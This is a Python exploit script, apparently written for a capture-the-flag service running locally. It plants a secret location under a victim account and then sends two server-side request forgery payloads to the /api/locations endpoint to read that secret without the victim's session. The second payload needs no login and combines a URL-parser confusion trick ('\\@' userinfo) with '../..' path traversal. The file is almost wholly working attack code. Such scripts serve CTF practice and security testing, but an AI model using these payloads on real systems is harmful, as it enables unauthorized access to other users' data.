#!/usr/bin/env python3
import json
import os
import random
import re
import secrets
import string
from typing import Optional, Tuple

import requests
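# Base URL of the target instance. This script sends live HTTP traffic to it,
# so it defaults to the local CTF deployment the payloads below were written
# against; set TARGET_URL to point elsewhere. No trailing slash — every path
# below is concatenated onto this value verbatim.
IP = os.environ.get("TARGET_URL", "http://127.0.0.1:4241").rstrip("/")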
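def register(uname, pw, *, timeout=10.0):
    """Create an agent account via POST /register.

    Args:
        uname: agent alias to register (sent as the ``agent_alias`` field).
        pw: password for the new account (sent as the ``password`` field).
        timeout: seconds to wait for the server, keyword-only. The original
            call had no timeout, so an unresponsive target hung the script.

    Returns:
        True when the response body contains the banner
        "Registered new agent", False otherwise. The server's reason for a
        rejection is not inspected — a False here may mean the alias already
        exists or that the markup changed; check manually if it is unexpected.

    Raises:
        requests.RequestException: propagated on connection failure or timeout.
    """
    url = IP + '/register'
    form_data = {'agent_alias': uname, 'password': pw}
    r = requests.post(url, data=form_data, timeout=timeout)
    # Success is only signalled through page text, not a status code, so
    # the banner match is the whole contract.
    return "Registered new agent" in r.text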
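def login(uname, pw, *, timeout=10.0) -> Tuple[bool, Optional["requests.Session"], Optional[str]]:
    """Log in as *uname* and return an authenticated session plus agent id.

    Args:
        uname: agent alias (``agent_alias`` form field).
        pw: password (``password`` form field).
        timeout: seconds to wait for the server, keyword-only.

    Returns:
        ``(True, session, agent_id)`` on success. ``session`` is the
        ``requests.Session`` holding the server's ``session`` cookie;
        ``agent_id`` is the 36-character ``[0-9a-f-]`` value scraped from the
        ``id="agent-id" title="..."`` attributes of the post-login page.
        ``(False, None, None)`` when no ``session`` cookie was set or the
        page does not contain exactly one such id. (The original annotation
        claimed ``str`` for the session slot; it has always been a Session.)

    Raises:
        requests.RequestException: propagated on connection failure or timeout.
    """
    s = requests.Session()
    url = IP + '/login'
    form_data = {'agent_alias': uname, 'password': pw}
    r = s.post(url, data=form_data, timeout=timeout)
    # A missing session cookie is the only failure signal used here; the
    # HTTP status is not consulted.
    if s.cookies.get('session') is None:
        return (False, None, None)
    uid = re.findall(r"id=\"agent-id\" title=\"([0-9a-f\-]{36})\"", r.text)
    # Exactly one match is required: zero means the login page came back or
    # the markup changed, more than one means the scrape is ambiguous.
    if len(uid) != 1:
        return (False, None, None)
    return (True, s, uid[0])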
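# ----- Store secret -----
# Victim setup: register a throwaway agent and store a location on the
# "private_loc" server whose tag is the secret the exploits below try to read
# without that agent's session.
SECRET = "FLAG_123"
# The credentials only need to be unpredictable enough not to collide across
# runs; secrets.choice is used instead of random.choices so a throwaway
# account is never derivable from seedable PRNG state.
uname = "".join(secrets.choice(string.ascii_letters) for _ in range(8))
pw = "".join(secrets.choice(string.ascii_letters) for _ in range(8))
print(f"uname: {uname}, pw: {pw}")
# Explicit checks rather than assert: assert is stripped under `python -O`,
# and a failed setup must stop here instead of running the exploits against
# a victim that was never created.
if not register(uname, pw):
    raise SystemExit("setup failed: registration was not acknowledged")
(success, s, uid) = login(uname, pw)
if not success:
    raise SystemExit("setup failed: login returned no session cookie / agent id")
url = IP + '/api/location/add'
json_data = {"tag": SECRET,
             "lat": 2,
             "lon": 3}
form_data = {'jsonData': json.dumps(json_data),
             'server': "private_loc"}
r = s.post(url, data=form_data, timeout=10)
# The add endpoint's success banner is not known from this script, so the
# weakest useful check is applied: an HTTP error here means the secret was
# never stored and any later "exploit" output would be a false negative.
r.raise_for_status()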
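# EXPLOITS
# Both attempts target GET /api/locations?server=<value>. The victim stored its
# location with server="private_loc" and the payloads name "private_loc:4242",
# which suggests the server-side handler builds an internal URL from the
# `server` value and fetches it; that backend is not visible here, so treat the
# mechanism as a hypothesis to confirm against the target.
UID = uid
print(f"uid: {UID}")
# ----- Exploit #1 login needed -----
# Attacker account. The registration result is deliberately ignored because
# the alias may already exist from an earlier run; the login, however, has to
# succeed or `s` would be None and the GET below would raise AttributeError.
register("exploit", "pw")
(ok, s, _) = login("exploit", "pw")
if not ok:
    raise SystemExit("exploit #1: could not log in as the attacker account")
url = IP + "/api/locations?server="
# The injected value is the internal host followed by the victim's location
# path, ending in `?comment=` so that anything the server appends after the
# `server` value lands in a query string rather than altering the path.
exploit = f"private_loc:4242/location/{UID}?comment="
url = url + exploit
r = s.get(url, timeout=10)
print("login exploit: " + r.text)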
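# ----- Exploit #2 no login needed -----
# Unauthenticated variant sent with a plain requests.get (no session cookie).
# The backslash is part of the payload: the original wrote `\@`, which only
# works because Python keeps unknown escape sequences verbatim (a SyntaxWarning
# from 3.12 on). It is written as an explicit `\\@` here; the bytes sent are
# identical: `private_loc:4242\@public_loc:4242/../../location/<uid>?comment=`.
# The `\@` plus `../..` shape reads like a host-check/URL-parser differential
# (one parser sees `public_loc` as the host, another treats the text before
# `@` as userinfo and keeps `private_loc`) combined with path traversal — but
# the server-side parsing is not visible in this file, so confirm that
# reading against the target before relying on it.
url = IP + "/api/locations?server="
exploit = f"private_loc:4242\\@public_loc:4242/../../location/{UID}?comment="
url = url + exploit
r = requests.get(url, timeout=10)
print("no login exploit: " + r.text)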